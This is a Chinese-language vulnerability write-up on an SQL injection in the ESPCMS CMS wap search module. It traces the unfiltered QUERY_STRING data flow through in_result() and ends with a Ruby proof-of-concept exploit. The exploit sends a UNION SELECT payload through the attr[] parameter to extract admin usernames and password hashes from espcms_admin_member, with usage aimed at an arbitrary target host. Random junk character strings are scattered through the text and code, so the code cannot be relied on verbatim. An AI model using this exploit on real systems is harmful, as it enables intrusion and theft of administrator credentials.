espcms wap模块搜索处SQL注入

admin

0×0 漏洞概述0×1 漏洞细节
/ [; Q  x4 W  B2 x. q3 A0×2 PoC
( c1 k" K4 A7 \! |  s4 s1 H


7 Z9 k* A! \0 y# e% w% n0×0 漏洞概述
9 S9 s+ E6 U# k4 O7 f% H
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统，它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便，可以帮您迅速、轻松地构建起一个强大专业的企业网站。
其在处理传入的参数时考虑不严谨导致SQL注入发生


0×1 漏洞细节
. {3 Z9 i- ^( g6 c, o
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query，整个过程无过滤导致了注入的发生。
0 [! @6 Q) s* H8 {2 {正因为变量是从$_SERVER['QUERY_STRING']中去取的，所以正好避开了程序的过滤。
1 B5 g, v4 |1 X, N- m- M而注入的变量是数组的值，并非数组的key，所以也没过被过滤，综合起来形成了一个比较少见的SQL注入。
6 M- t' j+ I: ~
在/interface/3gwap_search.php文件的in_result函数中:



1 W6 Q( g4 n6 I3 E7 e/ k$ |4 c       function in_result() {
. ]7 V" B. S( @            ... ... ... ... ... ... ... ... ...
            $urlcode = $_SERVER[ 'QUERY_STRING '];
            parse_str(html_entity_decode($urlcode), $output);
5 f6 A, d2 f# {1 T) C, S
& {( l7 M5 |9 _" g/ C            ... ... ... ... ... ... ... ... ...
/ ~% ?1 l8 f5 T            if (is_array($output['attr' ]) && count($output['attr']) > 0) {
  `$ X6 \9 y( h- ?5 R% u
: m  z$ u) U5 v$ j                  $db_table = db_prefix . 'model_att';
/ I. e/ x3 K: R4 y) n! U# b
                   foreach ($output['attr' ] as $key => $value) {
                         if ($value) {

; \* d1 M: y9 O/ S- x                              $key = addslashes($key);
                              $key = $this-> fun->inputcodetrim($key);
                              $db_att_where = " WHERE isclass=1 AND attrname='$key'";
' e+ s" G" S6 |4 h# U, k2 K3 `  n0 F                              $countnum = $this->db_numrows($db_table, $db_att_where);
                               if ($countnum > 0) {
                                    $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
                              }
' ~9 A6 `& D" N$ F                        }
1 ~8 t5 L: X; S( n7 r                  }
  [- j& Y. Y7 l3 ~3 C            }
$ ]0 M1 a1 g; ~3 _9 S- R            if (!empty ($keyword) && empty($keyname)) {
7 U1 o! c+ u  `9 G                  $keyname = 'title';
                  $db_where.= " AND a.title like '%$keyword%'" ;
            } elseif (!empty ($keyword) && !empty($keyname)) {
                  $db_where.= " AND $keyname like '% $keyword%'";
            }
            $pagemax = 15;
  d5 C2 N% Y( h4 J5 ?
            $pagesylte = 1;

7 w) W' }, a& m) w# j# S             if ($countnum > 0) {
4 h! r- y* @6 S$ n, b2 L
                  $numpage = ceil($countnum / $pagemax);
. B. A0 c' l% g4 \" o            } else {
                  $numpage = 1;
) o9 G+ Z* }% e/ D. }            }
            $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
            $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' );            $rs = $this->db->query($sql);
            ... ... ... ... ... ... ... ... ...
2 ]; M) s( Z  k, \- g" g  `/ }      }
3 m; b2 n" U* i7 ]& T1 P
$ Y, n/ a! _$ i) F6 f
0×2 PoC
* \' k* @( k8 F. S8 ]  Y% A) u


require "net/http"
5 j8 g( k3 r6 C3 M4 V. ^5 a
* {6 S  q$ t) O3 x; k8 y+ rdef request(method, url)
+ H: O/ D& d# r0 u    if method.eql?("get")
        uri = URI.parse(url)
3 O  h( c' n6 s$ V        http = Net::HTTP.new(uri.host, uri.port)
1 a, }& z+ Z/ D4 r& u        response = http.request(Net::HTTP::Get.new(uri.request_uri))
8 r# ^7 ?& h( h( m: g1 a        return response
    end
end

doc =<<HERE
4 y: Q! H: d' E# S) x& N2 b-------------------------------------------------------
1 _/ t0 g# w3 ~. b/ _0 x8 f0 uEspcms Injection Exploit
0 ?# ]' P1 z* U  Z! GAuthor:ztz
Blog:http://ztz.fuzzexp.org/
-------------------------------------------------------
$ E9 [* }- g6 o' d5 M2 K
HERE
( L& T3 R! y& D0 Z# G$ X; p
usage =<<HERE
Usage:         ruby #{$0} host port path
: e0 K1 C9 W; [/ U0 K9 O4 {7 Iexample:     ruby #{$0} www.target.com 80 /
8 T+ R9 T$ W- v5 sHERE
( l( `! T4 F) I8 z. g
puts doc
1 D, y7 _6 R8 w3 }if ARGV.length < 3
; {/ Y! E4 g' t' Q8 P& p9 e9 d7 S    puts usage
, b7 B8 h2 t; |8 M$ qelse
- f5 m2 N) }; |- s    $host = ARGV[0]
    $port = ARGV[1]
    $path = ARGV[2]
1 X9 k; {9 w; d1 T# E4 Z
) s9 E6 _7 T, G9 E; K2 W1 \% L    puts "

send request..."
    url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
! {7 C* ~# V; s, A) Q& X; R,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
( j7 h. {! @5 O6 ?( u- G; O    response = request("get", url)
    result = response.body.scan(/\w+&\w{32}/)
    puts result
end
3 ]5 M. e6 K1 \0 J3 T9 X$ v6 ^
0 O$ W. S, ~" v4 v/ k5 t0 I* o